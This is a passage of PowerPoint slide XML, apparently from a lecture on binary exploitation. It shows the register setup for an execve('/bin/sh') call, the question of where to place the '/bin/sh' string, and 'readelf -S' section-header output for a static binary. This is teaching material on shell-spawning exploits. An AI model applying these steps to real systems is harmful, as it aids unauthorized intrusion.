              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", NULL] in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NULL in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where to put "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>348</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160150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610" y="63610"/>
            <a:ext cx="8961120" cy="6657867"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>starting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xa20f8:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:  </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Nr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   ES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Flg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Lk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Inf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </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[ 0]                   NULL            00000000 000000 000000 00      0   0  0  </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[ 1] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>note.ABI-tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     NOTE            080480f4 0000f4 000020 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0  4  </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[ 2] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>note.gnu.build-i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> NOTE            08048114 000114 000024 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0  4  </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[ 3] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rel.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          REL             08048138 000138 000070 08   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   5  4  </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[ 4] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080481a8 0001a8 000023 00  AX  0   0  4  </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[ 5] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              PROGBITS        080481d0 0001d0 0000e0 00  AX  0   0 16  </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[ 6] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080482b0 0002b0 075b04 00  AX  0   0 16  </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[ 7] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_freeres_fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080bddc0 075dc0 000b36 00  AX  0   0 16  </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[ 8] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_thread_fre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080be900 076900 000076 00  AX  0   0 16  </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[ 9] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080be978 076978 000014 00  AX  0   0  4  </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[10] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           PROGBITS        080be9a0 0769a0 01bf90 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0 32  </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[11] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_subfreeres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080da930 092930 00002c 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0  4  </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[12] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_atexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     PROGBITS        080da95c 09295c 000004 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0  4  </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[13] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_thread_sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080da960 092960 000004 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0  4  </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[14] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eh_frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>         PROGBITS        080da964 092964 00e108 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0  4  </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[15] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc_except_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080e8a6c 0a0a6c 0000a3 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0  1  </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[16] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            PROGBITS        080e9f58 0a0f58 000010 00 WAT  0   0  4  </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[17] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tbss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             NOBITS          080e9f68 0a0f68 000018 00 WAT  0   0  4  </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[18] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>init_array</a:t>
            </a:r>
            <a:r>
